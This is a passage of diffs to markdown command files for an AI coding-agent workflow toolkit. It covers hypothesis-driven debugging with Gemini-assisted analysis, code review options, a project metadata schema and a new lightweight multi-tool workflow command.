**Step 1.3: Gemini-Assisted Hypothesis Generation**
|
||||
|
||||
```bash
|
||||
ccw cli -p "
|
||||
PURPOSE: Generate debugging hypotheses for: ${bug_description}
|
||||
Success criteria: Testable hypotheses with clear evidence criteria
|
||||
|
||||
TASK:
|
||||
• Analyze error pattern and code search results
|
||||
• Identify 3-5 most likely root causes
|
||||
• For each hypothesis, specify:
|
||||
- What might be wrong
|
||||
- What evidence would confirm/reject it
|
||||
- Where to add instrumentation
|
||||
• Rank by likelihood
|
||||
|
||||
MODE: analysis
|
||||
|
||||
CONTEXT: @${sessionFolder}/understanding.md | Search results in understanding.md
|
||||
|
||||
EXPECTED:
|
||||
- Structured hypothesis list (JSON format)
|
||||
- Each hypothesis with: id, description, testable_condition, logging_point, evidence_criteria
|
||||
- Likelihood ranking (1=most likely)
|
||||
|
||||
CONSTRAINTS: Focus on testable conditions
|
||||
" --tool gemini --mode analysis --rule analysis-diagnose-bug-root-cause
|
||||
```
|
||||
|
||||
Save Gemini output to `hypotheses.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"iteration": 1,
|
||||
"timestamp": "2025-01-21T10:00:00+08:00",
|
||||
"hypotheses": [
|
||||
{
|
||||
"id": "H1",
|
||||
"description": "Data structure mismatch - expected key not present",
|
||||
"testable_condition": "Check if target key exists in dict",
|
||||
"logging_point": "file.py:func:42",
|
||||
"evidence_criteria": {
|
||||
"confirm": "data shows missing key",
|
||||
"reject": "key exists with valid value"
|
||||
},
|
||||
"likelihood": 1,
|
||||
"status": "pending"
|
||||
}
|
||||
],
|
||||
"gemini_insights": "...",
|
||||
"corrected_assumptions": []
|
||||
}
|
||||
```
|
||||
|
||||
**Step 1.4: Add NDJSON Instrumentation**
|
||||
|
||||
For each hypothesis, add logging (same as original debug command).
|
||||
|
||||
**Step 1.5: Update understanding.md**
|
||||
|
||||
Append hypothesis section:
|
||||
|
||||
```markdown
|
||||
#### Hypotheses Generated (Gemini-Assisted)
|
||||
|
||||
${hypotheses.map(h => `
|
||||
**${h.id}** (Likelihood: ${h.likelihood}): ${h.description}
|
||||
- Logging at: ${h.logging_point}
|
||||
- Testing: ${h.testable_condition}
|
||||
- Evidence to confirm: ${h.evidence_criteria.confirm}
|
||||
- Evidence to reject: ${h.evidence_criteria.reject}
|
||||
`).join('\n')}
|
||||
|
||||
**Gemini Insights**: ${geminiInsights}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Analyze Mode
|
||||
|
||||
**Step 2.1: Parse Debug Log**
|
||||
|
||||
```javascript
|
||||
// Parse NDJSON log
|
||||
const entries = Read(debugLogPath).split('\n')
|
||||
.filter(l => l.trim())
|
||||
.map(l => JSON.parse(l))
|
||||
|
||||
// Group by hypothesis
|
||||
const byHypothesis = groupBy(entries, 'hid')
|
||||
```
|
||||
|
||||
**Step 2.2: Gemini-Assisted Evidence Analysis**
|
||||
|
||||
```bash
|
||||
ccw cli -p "
|
||||
PURPOSE: Analyze debug log evidence to validate/correct hypotheses for: ${bug_description}
|
||||
Success criteria: Clear verdict per hypothesis + corrected understanding
|
||||
|
||||
TASK:
|
||||
• Parse log entries by hypothesis
|
||||
• Evaluate evidence against expected criteria
|
||||
• Determine verdict: confirmed | rejected | inconclusive
|
||||
• Identify incorrect assumptions from previous understanding
|
||||
• Suggest corrections to understanding
|
||||
|
||||
MODE: analysis
|
||||
|
||||
CONTEXT:
|
||||
@${debugLogPath}
|
||||
@${understandingPath}
|
||||
@${hypothesesPath}
|
||||
|
||||
EXPECTED:
|
||||
- Per-hypothesis verdict with reasoning
|
||||
- Evidence summary
|
||||
- List of incorrect assumptions with corrections
|
||||
- Updated consolidated understanding
|
||||
- Root cause if confirmed, or next investigation steps
|
||||
|
||||
CONSTRAINTS: Evidence-based reasoning only, no speculation
|
||||
" --tool gemini --mode analysis --rule analysis-diagnose-bug-root-cause
|
||||
```
|
||||
|
||||
**Step 2.3: Update Understanding with Corrections**
|
||||
|
||||
Append new iteration to `understanding.md`:
|
||||
|
||||
```markdown
|
||||
### Iteration ${n} - Evidence Analysis (${timestamp})
|
||||
|
||||
#### Log Analysis Results
|
||||
|
||||
${results.map(r => `
|
||||
**${r.id}**: ${r.verdict.toUpperCase()}
|
||||
- Evidence: ${JSON.stringify(r.evidence)}
|
||||
- Reasoning: ${r.reason}
|
||||
`).join('\n')}
|
||||
|
||||
#### Corrected Understanding
|
||||
|
||||
Previous misunderstandings identified and corrected:
|
||||
|
||||
${corrections.map(c => `
|
||||
- ~~${c.wrong}~~ → ${c.corrected}
|
||||
- Why wrong: ${c.reason}
|
||||
- Evidence: ${c.evidence}
|
||||
`).join('\n')}
|
||||
|
||||
#### New Insights
|
||||
|
||||
${newInsights.join('\n- ')}
|
||||
|
||||
#### Gemini Analysis
|
||||
|
||||
${geminiAnalysis}
|
||||
|
||||
${confirmedHypothesis ? `
|
||||
#### Root Cause Identified
|
||||
|
||||
**${confirmedHypothesis.id}**: ${confirmedHypothesis.description}
|
||||
|
||||
Evidence supporting this conclusion:
|
||||
${confirmedHypothesis.supportingEvidence}
|
||||
` : `
|
||||
#### Next Steps
|
||||
|
||||
${nextSteps}
|
||||
`}
|
||||
|
||||
---
|
||||
|
||||
## Current Consolidated Understanding (Updated)
|
||||
|
||||
${consolidatedUnderstanding}
|
||||
```
|
||||
|
||||
**Step 2.4: Consolidate Understanding**
|
||||
|
||||
At the bottom of `understanding.md`, update the consolidated section:
|
||||
|
||||
- Remove or simplify proven-wrong assumptions
|
||||
- Keep them in strikethrough for reference
|
||||
- Focus on current valid understanding
|
||||
- Avoid repeating details from timeline
|
||||
|
||||
```markdown
|
||||
## Current Consolidated Understanding
|
||||
|
||||
### What We Know
|
||||
|
||||
- ${validUnderstanding1}
|
||||
- ${validUnderstanding2}
|
||||
|
||||
### What Was Disproven
|
||||
|
||||
- ~~Initial assumption: ${wrongAssumption}~~ (Evidence: ${disproofEvidence})
|
||||
|
||||
### Current Investigation Focus
|
||||
|
||||
${currentFocus}
|
||||
|
||||
### Remaining Questions
|
||||
|
||||
- ${openQuestion1}
|
||||
- ${openQuestion2}
|
||||
```
|
||||
|
||||
**Step 2.5: Update hypotheses.json**
|
||||
|
||||
```json
|
||||
{
|
||||
"iteration": 2,
|
||||
"timestamp": "2025-01-21T10:15:00+08:00",
|
||||
"hypotheses": [
|
||||
{
|
||||
"id": "H1",
|
||||
"status": "rejected",
|
||||
"verdict_reason": "Evidence shows key exists with valid value",
|
||||
"evidence": {...}
|
||||
},
|
||||
{
|
||||
"id": "H2",
|
||||
"status": "confirmed",
|
||||
"verdict_reason": "Log data confirms timing issue",
|
||||
"evidence": {...}
|
||||
}
|
||||
],
|
||||
"gemini_corrections": [
|
||||
{
|
||||
"wrong_assumption": "...",
|
||||
"corrected_to": "...",
|
||||
"reason": "..."
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Fix & Verification
|
||||
|
||||
**Step 3.1: Apply Fix**
|
||||
|
||||
(Same as original debug command)
|
||||
|
||||
**Step 3.2: Document Resolution**
|
||||
|
||||
Append to `understanding.md`:
|
||||
|
||||
```markdown
|
||||
### Iteration ${n} - Resolution (${timestamp})
|
||||
|
||||
#### Fix Applied
|
||||
|
||||
- Modified files: ${modifiedFiles.join(', ')}
|
||||
- Fix description: ${fixDescription}
|
||||
- Root cause addressed: ${rootCause}
|
||||
|
||||
#### Verification Results
|
||||
|
||||
${verificationResults}
|
||||
|
||||
#### Lessons Learned
|
||||
|
||||
What we learned from this debugging session:
|
||||
|
||||
1. ${lesson1}
|
||||
2. ${lesson2}
|
||||
3. ${lesson3}
|
||||
|
||||
#### Key Insights for Future
|
||||
|
||||
- ${insight1}
|
||||
- ${insight2}
|
||||
```
|
||||
|
||||
**Step 3.3: Cleanup**
|
||||
|
||||
Remove debug instrumentation (same as original command).
|
||||
|
||||
---
|
||||
|
||||
## Session Folder Structure
|
||||
|
||||
```
|
||||
.workflow/.debug/DBG-{slug}-{date}/
|
||||
├── debug.log # NDJSON log (execution evidence)
|
||||
├── understanding.md # NEW: Exploration timeline + consolidated understanding
|
||||
├── hypotheses.json # NEW: Hypothesis history with verdicts
|
||||
└── resolution.md # Optional: Final summary
|
||||
```
|
||||
|
||||
## Understanding Document Template
|
||||
|
||||
```markdown
|
||||
# Understanding Document
|
||||
|
||||
**Session ID**: DBG-xxx-2025-01-21
|
||||
**Bug Description**: [original description]
|
||||
**Started**: 2025-01-21T10:00:00+08:00
|
||||
|
||||
---
|
||||
|
||||
## Exploration Timeline
|
||||
|
||||
### Iteration 1 - Initial Exploration (2025-01-21 10:00)
|
||||
|
||||
#### Current Understanding
|
||||
...
|
||||
|
||||
#### Evidence from Code Search
|
||||
...
|
||||
|
||||
#### Hypotheses Generated (Gemini-Assisted)
|
||||
...
|
||||
|
||||
### Iteration 2 - Evidence Analysis (2025-01-21 10:15)
|
||||
|
||||
#### Log Analysis Results
|
||||
...
|
||||
|
||||
#### Corrected Understanding
|
||||
- ~~[wrong]~~ → [corrected]
|
||||
|
||||
#### Gemini Analysis
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## Current Consolidated Understanding
|
||||
|
||||
### What We Know
|
||||
- [valid understanding points]
|
||||
|
||||
### What Was Disproven
|
||||
- ~~[disproven assumptions]~~
|
||||
|
||||
### Current Investigation Focus
|
||||
[current focus]
|
||||
|
||||
### Remaining Questions
|
||||
- [open questions]
|
||||
```
|
||||
|
||||
## Iteration Flow
|
||||
|
||||
```
|
||||
First Call (/workflow:debug-with-file "error"):
|
||||
├─ No session exists → Explore mode
|
||||
├─ Extract error keywords, search codebase
|
||||
├─ Document initial understanding in understanding.md
|
||||
├─ Use Gemini to generate hypotheses
|
||||
├─ Add logging instrumentation
|
||||
└─ Await user reproduction
|
||||
|
||||
After Reproduction (/workflow:debug-with-file "error"):
|
||||
├─ Session exists + debug.log has content → Analyze mode
|
||||
├─ Parse log, use Gemini to evaluate hypotheses
|
||||
├─ Update understanding.md with:
|
||||
│ ├─ Evidence analysis results
|
||||
│ ├─ Corrected misunderstandings (strikethrough)
|
||||
│ ├─ New insights
|
||||
│ └─ Updated consolidated understanding
|
||||
├─ Update hypotheses.json with verdicts
|
||||
└─ Decision:
|
||||
├─ Confirmed → Fix → Document resolution
|
||||
├─ Inconclusive → Add logging, document next steps
|
||||
└─ All rejected → Gemini-assisted new hypotheses
|
||||
|
||||
Output:
|
||||
├─ .workflow/.debug/DBG-{slug}-{date}/debug.log
|
||||
├─ .workflow/.debug/DBG-{slug}-{date}/understanding.md (evolving document)
|
||||
└─ .workflow/.debug/DBG-{slug}-{date}/hypotheses.json (history)
|
||||
```
|
||||
|
||||
## Gemini Integration Points
|
||||
|
||||
### 1. Hypothesis Generation (Explore Mode)
|
||||
|
||||
**Purpose**: Generate evidence-based, testable hypotheses
|
||||
|
||||
**Prompt Pattern**:
|
||||
```
|
||||
PURPOSE: Generate debugging hypotheses + evidence criteria
|
||||
TASK: Analyze error + code → testable hypotheses with clear pass/fail criteria
|
||||
CONTEXT: @understanding.md (search results)
|
||||
EXPECTED: JSON with hypotheses, likelihood ranking, evidence criteria
|
||||
```
|
||||
|
||||
### 2. Evidence Analysis (Analyze Mode)
|
||||
|
||||
**Purpose**: Validate hypotheses and correct misunderstandings
|
||||
|
||||
**Prompt Pattern**:
|
||||
```
|
||||
PURPOSE: Analyze debug log evidence + correct understanding
|
||||
TASK: Evaluate each hypothesis → identify wrong assumptions → suggest corrections
|
||||
CONTEXT: @debug.log @understanding.md @hypotheses.json
|
||||
EXPECTED: Verdicts + corrections + updated consolidated understanding
|
||||
```
|
||||
|
||||
### 3. New Hypothesis Generation (After All Rejected)
|
||||
|
||||
**Purpose**: Generate new hypotheses based on what was disproven
|
||||
|
||||
**Prompt Pattern**:
|
||||
```
|
||||
PURPOSE: Generate new hypotheses given disproven assumptions
|
||||
TASK: Review rejected hypotheses → identify knowledge gaps → new investigation angles
|
||||
CONTEXT: @understanding.md (with disproven section) @hypotheses.json
|
||||
EXPECTED: New hypotheses avoiding previously rejected paths
|
||||
```
|
||||
|
||||
## Error Correction Mechanism
|
||||
|
||||
### Correction Format in understanding.md
|
||||
|
||||
```markdown
|
||||
#### Corrected Understanding
|
||||
|
||||
- ~~Assumed dict key "config" was missing~~ → Key exists, but value is None
|
||||
- Why wrong: Only checked existence, not value validity
|
||||
- Evidence: H1 log shows {"config": null, "exists": true}
|
||||
|
||||
- ~~Thought error occurred in initialization~~ → Error happens during runtime update
|
||||
- Why wrong: Stack trace misread as init code
|
||||
- Evidence: H2 timestamp shows 30s after startup
|
||||
```
|
||||
|
||||
### Consolidation Rules
|
||||
|
||||
When updating "Current Consolidated Understanding":
|
||||
|
||||
1. **Simplify disproven items**: Move to "What Was Disproven" with single-line summary
|
||||
2. **Keep valid insights**: Promote confirmed findings to "What We Know"
|
||||
3. **Avoid duplication**: Don't repeat timeline details in consolidated section
|
||||
4. **Focus on current state**: What do we know NOW, not the journey
|
||||
5. **Preserve key corrections**: Keep important wrong→right transformations for learning
|
||||
|
||||
**Bad (cluttered)**:
|
||||
```markdown
|
||||
## Current Consolidated Understanding
|
||||
|
||||
In iteration 1 we thought X, but in iteration 2 we found Y, then in iteration 3...
|
||||
Also we checked A and found B, and then we checked C...
|
||||
```
|
||||
|
||||
**Good (consolidated)**:
|
||||
```markdown
|
||||
## Current Consolidated Understanding
|
||||
|
||||
### What We Know
|
||||
- Error occurs during runtime update, not initialization
|
||||
- Config value is None (not missing key)
|
||||
|
||||
### What Was Disproven
|
||||
- ~~Initialization error~~ (Timing evidence)
|
||||
- ~~Missing key hypothesis~~ (Key exists)
|
||||
|
||||
### Current Investigation Focus
|
||||
Why is config value None during update?
|
||||
```
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
|
||||
|
||||
---
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Situation | Action |
|
||||
|-----------|--------|
|
||||
| Empty debug.log | Verify reproduction triggered the code path |
|
||||
| All hypotheses rejected | Use Gemini to generate new hypotheses based on disproven assumptions |
|
||||
| Fix doesn't work | Document failed fix attempt, iterate with refined understanding |
|
||||
| >5 iterations | Review consolidated understanding, escalate to `/workflow:lite-fix` with full context |
|
||||
| Gemini unavailable | Fallback to manual hypothesis generation, document without Gemini insights |
|
||||
| Understanding too long | Consolidate aggressively, archive old iterations to separate file |
|
||||
|
||||
## Comparison with /workflow:debug
|
||||
|
||||
| Feature | /workflow:debug | /workflow:debug-with-file |
|
||||
|---------|-----------------|---------------------------|
|
||||
| NDJSON logging | ✅ | ✅ |
|
||||
| Hypothesis generation | Manual | Gemini-assisted |
|
||||
| Exploration documentation | ❌ | ✅ understanding.md |
|
||||
| Understanding evolution | ❌ | ✅ Timeline + corrections |
|
||||
| Error correction | ❌ | ✅ Strikethrough + reasoning |
|
||||
| Consolidated learning | ❌ | ✅ Current understanding section |
|
||||
| Hypothesis history | ❌ | ✅ hypotheses.json |
|
||||
| Gemini validation | ❌ | ✅ At key decision points |
|
||||
|
||||
## Usage Recommendations
|
||||
|
||||
Use `/workflow:debug-with-file` when:
|
||||
- Complex bugs requiring multiple investigation rounds
|
||||
- Learning from debugging process is valuable
|
||||
- Team needs to understand debugging rationale
|
||||
- Bug might recur, documentation helps prevention
|
||||
|
||||
Use `/workflow:debug` when:
|
||||
- Simple, quick bugs
|
||||
- One-off issues
|
||||
- Documentation overhead not needed
|
||||
@@ -311,6 +311,12 @@ Output:
|
||||
└─ .workflow/.debug/DBG-{slug}-{date}/debug.log
|
||||
```
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
|
||||
|
||||
---
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Situation | Action |
|
||||
|
||||
@@ -275,6 +275,10 @@ AskUserQuestion({
|
||||
- **"Enter Review"**: Execute `/workflow:review`
|
||||
- **"Complete Session"**: Execute `/workflow:session:complete`
|
||||
|
||||
### Post-Completion Expansion
|
||||
|
||||
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
|
||||
|
||||
## Execution Strategy (IMPL_PLAN-Driven)
|
||||
|
||||
### Strategy Priority
|
||||
|
||||
@@ -108,11 +108,24 @@ Analyze project for workflow initialization and generate .workflow/project-tech.
|
||||
2. Execute: ccw tool exec get_modules_by_depth '{}' (get project structure)
|
||||
|
||||
## Task
|
||||
Generate complete project-tech.json with:
|
||||
- project_metadata: {name: ${projectName}, root_path: ${projectRoot}, initialized_at, updated_at}
|
||||
- technology_analysis: {description, languages, frameworks, build_tools, test_frameworks, architecture, key_components, dependencies}
|
||||
- development_status: ${regenerate ? 'preserve from backup' : '{completed_features: [], development_index: {feature: [], enhancement: [], bugfix: [], refactor: [], docs: []}, statistics: {total_features: 0, total_sessions: 0, last_updated}}'}
|
||||
- _metadata: {initialized_by: "cli-explore-agent", analysis_timestamp, analysis_mode}
|
||||
Generate complete project-tech.json following the schema structure:
|
||||
- project_name: "${projectName}"
|
||||
- initialized_at: ISO 8601 timestamp
|
||||
- overview: {
|
||||
description: "Brief project description",
|
||||
technology_stack: {
|
||||
languages: [{name, file_count, primary}],
|
||||
frameworks: ["string"],
|
||||
build_tools: ["string"],
|
||||
test_frameworks: ["string"]
|
||||
},
|
||||
architecture: {style, layers: [], patterns: []},
|
||||
key_components: [{name, path, description, importance}]
|
||||
}
|
||||
- features: []
|
||||
- development_index: ${regenerate ? 'preserve from backup' : '{feature: [], enhancement: [], bugfix: [], refactor: [], docs: []}'}
|
||||
- statistics: ${regenerate ? 'preserve from backup' : '{total_features: 0, total_sessions: 0, last_updated: ISO timestamp}'}
|
||||
- _metadata: {initialized_by: "cli-explore-agent", analysis_timestamp: ISO timestamp, analysis_mode: "deep-scan"}
|
||||
|
||||
## Analysis Requirements
|
||||
|
||||
@@ -132,7 +145,7 @@ Generate complete project-tech.json with:
|
||||
1. Structural scan: get_modules_by_depth.sh, find, wc -l
|
||||
2. Semantic analysis: Gemini for patterns/architecture
|
||||
3. Synthesis: Merge findings
|
||||
4. ${regenerate ? 'Merge with preserved development_status from .workflow/project-tech.json.backup' : ''}
|
||||
4. ${regenerate ? 'Merge with preserved development_index and statistics from .workflow/project-tech.json.backup' : ''}
|
||||
5. Write JSON: Write('.workflow/project-tech.json', jsonContent)
|
||||
6. Report: Return brief completion summary
|
||||
|
||||
@@ -181,16 +194,16 @@ console.log(`
|
||||
✓ Project initialized successfully
|
||||
|
||||
## Project Overview
|
||||
Name: ${projectTech.project_metadata.name}
|
||||
Description: ${projectTech.technology_analysis.description}
|
||||
Name: ${projectTech.project_name}
|
||||
Description: ${projectTech.overview.description}
|
||||
|
||||
### Technology Stack
|
||||
Languages: ${projectTech.technology_analysis.languages.map(l => l.name).join(', ')}
|
||||
Frameworks: ${projectTech.technology_analysis.frameworks.join(', ')}
|
||||
Languages: ${projectTech.overview.technology_stack.languages.map(l => l.name).join(', ')}
|
||||
Frameworks: ${projectTech.overview.technology_stack.frameworks.join(', ')}
|
||||
|
||||
### Architecture
|
||||
Style: ${projectTech.technology_analysis.architecture.style}
|
||||
Components: ${projectTech.technology_analysis.key_components.length} core modules
|
||||
Style: ${projectTech.overview.architecture.style}
|
||||
Components: ${projectTech.overview.key_components.length} core modules
|
||||
|
||||
---
|
||||
Files created:
|
||||
|
||||
@@ -81,6 +81,7 @@ AskUserQuestion({
|
||||
options: [
|
||||
{ label: "Skip", description: "No review" },
|
||||
{ label: "Gemini Review", description: "Gemini CLI tool" },
|
||||
{ label: "Codex Review", description: "Git-aware review (prompt OR --uncommitted)" },
|
||||
{ label: "Agent Review", description: "Current agent review" }
|
||||
]
|
||||
}
|
||||
@@ -171,10 +172,23 @@ Output:
|
||||
**Operations**:
|
||||
- Initialize result tracking for multi-execution scenarios
|
||||
- Set up `previousExecutionResults` array for context continuity
|
||||
- **In-Memory Mode**: Echo execution strategy from lite-plan for transparency
|
||||
|
||||
```javascript
|
||||
// Initialize result tracking
|
||||
previousExecutionResults = []
|
||||
|
||||
// In-Memory Mode: Echo execution strategy (transparency before execution)
|
||||
if (executionContext) {
|
||||
console.log(`
|
||||
📋 Execution Strategy (from lite-plan):
|
||||
Method: ${executionContext.executionMethod}
|
||||
Review: ${executionContext.codeReviewTool}
|
||||
Tasks: ${executionContext.planObject.tasks.length}
|
||||
Complexity: ${executionContext.planObject.complexity}
|
||||
${executionContext.executorAssignments ? ` Assignments: ${JSON.stringify(executionContext.executorAssignments)}` : ''}
|
||||
`)
|
||||
}
|
||||
```
|
||||
|
||||
### Step 2: Task Grouping & Batch Creation
|
||||
@@ -392,16 +406,8 @@ ccw cli -p "${buildExecutionPrompt(batch)}" --tool codex --mode write
|
||||
|
||||
**Execution with fixed IDs** (predictable ID pattern):
|
||||
```javascript
|
||||
// Launch CLI in foreground (NOT background)
|
||||
// Timeout based on complexity: Low=40min, Medium=60min, High=100min
|
||||
const timeoutByComplexity = {
|
||||
"Low": 2400000, // 40 minutes
|
||||
"Medium": 3600000, // 60 minutes
|
||||
"High": 6000000 // 100 minutes
|
||||
}
|
||||
|
||||
// Launch CLI in background, wait for task hook callback
|
||||
// Generate fixed execution ID: ${sessionId}-${groupId}
|
||||
// This enables predictable ID lookup without relying on resume context chains
|
||||
const sessionId = executionContext?.session?.id || 'standalone'
|
||||
const fixedExecutionId = `${sessionId}-${batch.groupId}` // e.g., "implement-auth-2025-12-13-P1"
|
||||
|
||||
@@ -413,16 +419,12 @@ const cli_command = previousCliId
|
||||
? `ccw cli -p "${buildExecutionPrompt(batch)}" --tool codex --mode write --id ${fixedExecutionId} --resume ${previousCliId}`
|
||||
: `ccw cli -p "${buildExecutionPrompt(batch)}" --tool codex --mode write --id ${fixedExecutionId}`
|
||||
|
||||
bash_result = Bash(
|
||||
// Execute in background, stop output and wait for task hook callback
|
||||
Bash(
|
||||
command=cli_command,
|
||||
timeout=timeoutByComplexity[planObject.complexity] || 3600000
|
||||
run_in_background=true
|
||||
)
|
||||
|
||||
// Execution ID is now predictable: ${fixedExecutionId}
|
||||
// Can also extract from output: "ID: implement-auth-2025-12-13-P1"
|
||||
const cliExecutionId = fixedExecutionId
|
||||
|
||||
// Update TodoWrite when execution completes
|
||||
// STOP HERE - CLI executes in background, task hook will notify on completion
|
||||
```
|
||||
|
||||
**Resume on Failure** (with fixed ID):
|
||||
@@ -469,7 +471,8 @@ Progress tracked at batch level (not individual task level). Icons: ⚡ (paralle
|
||||
**Operations**:
|
||||
- Agent Review: Current agent performs direct review
|
||||
- Gemini Review: Execute gemini CLI with review prompt
|
||||
- Custom tool: Execute specified CLI tool (qwen, codex, etc.)
|
||||
- Codex Review: Two options - (A) with prompt for complex reviews, (B) `--uncommitted` flag only for quick reviews
|
||||
- Custom tool: Execute specified CLI tool (qwen, etc.)
|
||||
|
||||
**Unified Review Template** (All tools use same standard):
|
||||
|
||||
@@ -485,7 +488,7 @@ TASK: • Verify plan acceptance criteria fulfillment • Analyze code quality
|
||||
MODE: analysis
|
||||
CONTEXT: @**/* @{plan.json} [@{exploration.json}] | Memory: Review lite-execute changes against plan requirements
|
||||
EXPECTED: Quality assessment with acceptance criteria verification, issue identification, and recommendations. Explicitly check each acceptance criterion from plan.json tasks.
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/02-review-code-quality.txt) | Focus on plan acceptance criteria and plan adherence | analysis=READ-ONLY
|
||||
CONSTRAINTS: Focus on plan acceptance criteria and plan adherence | analysis=READ-ONLY
|
||||
```
|
||||
|
||||
**Tool-Specific Execution** (Apply shared prompt template above):
|
||||
@@ -504,8 +507,17 @@ ccw cli -p "[Shared Prompt Template with artifacts]" --tool gemini --mode analys
|
||||
ccw cli -p "[Shared Prompt Template with artifacts]" --tool qwen --mode analysis
|
||||
# Same prompt as Gemini, different execution engine
|
||||
|
||||
# Method 4: Codex Review (autonomous)
|
||||
ccw cli -p "[Verify plan acceptance criteria at ${plan.json}]" --tool codex --mode write
|
||||
# Method 4: Codex Review (git-aware) - Two mutually exclusive options:
|
||||
|
||||
# Option A: With custom prompt (reviews uncommitted by default)
|
||||
ccw cli -p "[Shared Prompt Template with artifacts]" --tool codex --mode review
|
||||
# Use for complex reviews with specific focus areas
|
||||
|
||||
# Option B: Target flag only (no prompt allowed)
|
||||
ccw cli --tool codex --mode review --uncommitted
|
||||
# Quick review of uncommitted changes without custom instructions
|
||||
|
||||
# ⚠️ IMPORTANT: -p prompt and target flags (--uncommitted/--base/--commit) are MUTUALLY EXCLUSIVE
|
||||
```
|
||||
|
||||
**Multi-Round Review with Fixed IDs**:
|
||||
@@ -531,11 +543,11 @@ if (hasUnresolvedIssues(reviewResult)) {
|
||||
|
||||
**Trigger**: After all executions complete (regardless of code review)
|
||||
|
||||
**Skip Condition**: Skip if `.workflow/project.json` does not exist
|
||||
**Skip Condition**: Skip if `.workflow/project-tech.json` does not exist
|
||||
|
||||
**Operations**:
|
||||
```javascript
|
||||
const projectJsonPath = '.workflow/project.json'
|
||||
const projectJsonPath = '.workflow/project-tech.json'
|
||||
if (!fileExists(projectJsonPath)) return // Silent skip
|
||||
|
||||
const projectJson = JSON.parse(Read(projectJsonPath))
|
||||
@@ -664,6 +676,10 @@ Collected after each execution call completes:
|
||||
|
||||
Appended to `previousExecutionResults` array for context continuity in multi-execution scenarios.
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
|
||||
|
||||
**Fixed ID Pattern**: `${sessionId}-${groupId}` enables predictable lookup without auto-generated timestamps.
|
||||
|
||||
**Resume Usage**: If `status` is "partial" or "failed", use `fixedCliId` to resume:
|
||||
|
||||
461
.claude/commands/workflow/lite-lite-lite.md
Normal file
461
.claude/commands/workflow/lite-lite-lite.md
Normal file
@@ -0,0 +1,461 @@
|
||||
---
|
||||
name: workflow:lite-lite-lite
|
||||
description: Ultra-lightweight multi-tool analysis and direct execution. No artifacts for simple tasks; auto-creates planning docs in .workflow/.scratchpad/ for complex tasks. Auto tool selection based on task analysis, user-driven iteration via AskUser.
|
||||
argument-hint: "<task description>"
|
||||
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Bash(*), Write(*), mcp__ace-tool__search_context(*), mcp__ccw-tools__write_file(*)
|
||||
---
|
||||
|
||||
# Ultra-Lite Multi-Tool Workflow
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
/workflow:lite-lite-lite "Fix the login bug"
|
||||
/workflow:lite-lite-lite "Refactor payment module for multi-gateway support"
|
||||
```
|
||||
|
||||
**Core Philosophy**: Minimal friction, maximum velocity. Simple tasks = no artifacts. Complex tasks = lightweight planning doc in `.workflow/.scratchpad/`.
|
||||
|
||||
## Overview
|
||||
|
||||
**Complexity-aware workflow**: Clarify → Assess Complexity → Select Tools → Multi-Mode Analysis → Decision → Direct Execution
|
||||
|
||||
**vs multi-cli-plan**: No IMPL_PLAN.md, plan.json, synthesis.json - state in memory or lightweight scratchpad doc for complex tasks.
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
Phase 1: Clarify Requirements → AskUser for missing details
|
||||
Phase 1.5: Assess Complexity → Determine if planning doc needed
|
||||
Phase 2: Select Tools (CLI → Mode → Agent) → 3-step selection
|
||||
Phase 3: Multi-Mode Analysis → Execute with --resume chaining
|
||||
Phase 4: User Decision → Execute / Refine / Change / Cancel
|
||||
Phase 5: Direct Execution → No plan files (simple) or scratchpad doc (complex)
|
||||
```
|
||||
|
||||
## Phase 1: Clarify Requirements
|
||||
|
||||
```javascript
|
||||
const taskDescription = $ARGUMENTS
|
||||
|
||||
if (taskDescription.length < 20 || isAmbiguous(taskDescription)) {
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Please provide more details: target files/modules, expected behavior, constraints?",
|
||||
header: "Details",
|
||||
options: [
|
||||
{ label: "I'll provide more", description: "Add more context" },
|
||||
{ label: "Continue analysis", description: "Let tools explore autonomously" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
}
|
||||
|
||||
// Optional: Quick ACE Context for complex tasks
|
||||
mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
query: `${taskDescription} implementation patterns`
|
||||
})
|
||||
```
|
||||
|
||||
## Phase 1.5: Assess Complexity
|
||||
|
||||
| Level | Creates Plan Doc | Trigger Keywords |
|
||||
|-------|------------------|------------------|
|
||||
| **simple** | ❌ | (default) |
|
||||
| **moderate** | ✅ | module, system, service, integration, multiple |
|
||||
| **complex** | ✅ | refactor, migrate, security, auth, payment, database |
|
||||
|
||||
```javascript
|
||||
// Complexity detection (after ACE query)
|
||||
const isComplex = /refactor|migrate|security|auth|payment|database/i.test(taskDescription)
|
||||
const isModerate = /module|system|service|integration|multiple/i.test(taskDescription) || aceContext?.relevant_files?.length > 2
|
||||
|
||||
if (isComplex || isModerate) {
|
||||
const planPath = `.workflow/.scratchpad/lite3-${taskSlug}-${dateStr}.md`
|
||||
// Create planning doc with: Task, Status, Complexity, Analysis Summary, Execution Plan, Progress Log
|
||||
}
|
||||
```
|
||||
|
||||
## Phase 2: Select Tools
|
||||
|
||||
### Tool Definitions
|
||||
|
||||
**CLI Tools** (from cli-tools.json):
|
||||
```javascript
|
||||
const cliConfig = JSON.parse(Read("~/.claude/cli-tools.json"))
|
||||
const cliTools = Object.entries(cliConfig.tools)
|
||||
.filter(([_, config]) => config.enabled)
|
||||
